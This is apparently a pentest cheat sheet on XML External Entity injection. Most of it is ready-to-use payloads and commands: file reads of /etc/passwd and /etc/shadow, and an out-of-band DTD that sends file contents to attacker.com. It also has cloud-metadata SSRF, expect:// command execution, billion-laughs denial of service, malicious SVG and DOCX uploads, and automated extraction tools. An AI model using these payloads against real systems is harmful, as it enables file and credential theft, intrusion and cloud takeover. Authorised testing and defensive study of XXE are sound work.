XXE
Sections XXE
XML External Entity injection. User-supplied XML is parsed with external entities enabled. Read files, SSRF, sometimes RCE.
T=https://target.com
i. Where it lives
XML parsers are everywhere, often hidden:
Obvious:
- SOAP endpoints
- REST APIs accepting
Content-Type: application/xmlortext/xml - RSS / Atom feed readers
- WebDAV endpoints
- XML-RPC interfaces (often at
/xmlrpc.php)
Hidden inside other formats (every modern Office doc is a zip of XML):
- DOCX, XLSX, PPTX uploads -
content.xml,word/document.xml - SVG uploads - entire format is XML
- PDF uploads (some processors parse embedded XML metadata)
- XMP metadata in images
- ICS calendar uploads
- KML / KMZ (Google Earth) uploads
- OOXML in older Office processors
Inside auth flows:
- SAML assertions (signed XML)
- WS-Security tokens
- XML-based OAuth implementations
Inside DBs and APIs:
- GraphQL with XML response support enabled
- BaseX, eXist-db, MarkLogic DBs over HTTP
Signal that XML is being parsed:
- App accepts XML-shaped bodies and returns parsed content
- Filename ends
.xml,.svg,.docx,.xlsx Content-Type: application/xmlin request or response- Error messages mention
SAXParseException,XMLParser,lxml
ii. Quick detection
Send a request with a basic external entity probe. The classic file-read test:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<root>&x;</root>
When /etc/passwd contents appear in the response, you’re in.
When you see no body change, switch to OOB blind XXE - see section iv.
iii. Burp + tooling
Burp’s Pro scanner includes active XXE checks. For manual testing in Burp:
- Send request to Repeater
- Drop in a probe payload from PayloadsAllTheThings
- Watch the response
XXEinjector for automated extraction:
ruby XXEinjector.rb --host=oast.live --httpport=8000 --file=request.txt
## Reads request.txt, attempts both direct and OOB XXE, extracts files
oxml_xxe for crafting XXE payloads inside DOCX/XLSX/PPTX:
git clone https://github.com/BuffaloWill/oxml_xxe
ruby ./oxml_xxe.rb
## Loads in browser, lets you build a malicious office doc and download
dotdotpwn for testing file path patterns in XXE responses:
dotdotpwn -m xxe -h target.com -O unix -t 10
iv. Blind XXE via OAST
Most modern parsers disable inline entity expansion in responses. Use OOB exfiltration via a parameter entity that resolves to your server:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % ext SYSTEM "http://attacker.com/x.dtd">
%ext;
]>
<root>test</root>
Your server hosts x.dtd:
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>">
%param1;
The target parses your DTD, reads /etc/passwd, sends it back via the exfil URL.
interactsh / Burp Collaborator as the listener:
interactsh-client
## Or use Burp's built-in Collaborator
Many parsers (libxml2 default) accept the external DTD fetch even when in-band entity expansion is disabled.
v. PHP filter chain for base64 file read
When the file you want has bytes that break XML (NULL, control chars), wrap it through PHP filters first. Works only when the target is PHP and php://filter is accessible:
<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
Returns base64 in the response. Decode on your side.
vi. SVG upload XXE
SVG is XML. Many image-handling pipelines (avatar upload, profile photo) pass SVG through a parser before stripping or converting.
Minimal test SVG:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&x;</text>
</svg>
Upload, view the rendered image. The hostname appears in the text.
Variant: librsvg + ImageMagick processing the SVG can be combined with ImageTragick-style exploits.
vii. Office document XXE (DOCX, XLSX, PPTX)
These are zip archives containing XML. Inject XXE into one of the inner XML files:
unzip target.docx -d unpacked/
## Edit unpacked/word/document.xml - inject XXE at top
## Repack:
cd unpacked && zip -r ../malicious.docx .
Then upload to the target’s “open document” feature. Common in cv-parser, doc-to-pdf, OCR services.
viii. SAML XXE
SAML responses are XML. If the SAML library doesn’t disable external entities, you have XXE in an auth flow.
Test by intercepting a SAML response with Burp + SAML Raider extension, injecting an external entity into the assertion, replaying. If the IdP echoes errors or trusts the assertion with injected entities, XXE.
ix. XXE to SSRF
Any URL handler in an entity becomes SSRF. The payload reads from your URL of choice:
<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">
Standard SSRF targets apply - see WEB12 SSRF . Cloud metadata endpoints are the highest-value (see Cloud Recon section viii for AWS / Azure / GCP IMDS).
Java parsers also support gopher://, ftp://, jar://, sometimes netdoc:// which expand the attack surface.
x. XXE to RCE
Direct RCE via XXE is rare and language-specific:
- PHP with
expect://wrapper enabled (rare default):<!ENTITY x SYSTEM "expect://id"> - Java with
jar://plus crafted JAR fetch (older parsers) - XSLT injection alongside XXE in some processors
For most cases, XXE → file read of credentials → use creds elsewhere → RCE.
xi. Billion laughs (DoS, mostly informational)
Recursive entity expansion exhausts memory:
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>
DoS-only, mention in report but don’t trigger on production targets.
xii. Tricks worth knowing
Try without <?xml prolog
Some parsers tolerate missing XML declaration. Inject into JSON endpoints that fallback to XML parsing on certain content-types.
Content-Type confusion
Send XML body to a JSON-accepting endpoint:
curl -X POST "$T/api/users" \
-H 'Content-Type: application/xml' \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]><user><name>&x;</name></user>'
Some frameworks auto-detect content type and parse based on body shape, not header.
XInclude when full XXE is blocked
XInclude is a separate XML feature that allows inclusion of external resources. Sometimes enabled even when DTD parsing is disabled:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
Don’t forget XSLT
XML processing pipelines sometimes accept XSLT transformations from user input. XSLT abuses include file read, SSRF, and depending on the processor, code execution.
XPath injection is the other XML bug
When user input is concatenated into an XPath query (not in the document but in the query selector), you can extract data similarly to SQLi. Common in LDAP-XPath bridges and XML DBs.
xiii. References
- PortSwigger - XXE - best guided lab
- PayloadsAllTheThings - XXE
- HackTricks - XXE
- oxml_xxe - office doc XXE generator
- SAML Raider - Burp extension for SAML XXE
xiv. Where it leads
- File read →
/etc/passwd,/etc/shadow(if readable), SSH keys, app configs, cloud credentials - SSRF via XXE → cloud metadata → cloud takeover via AWS / Azure / GCP
- Source code read → find more bugs offline (look for hardcoded creds, SQL queries, deserialization sinks)
- SAML XXE → auth bypass / impersonate any user
- PHP
expect://→ direct RCE → 04 Initial Access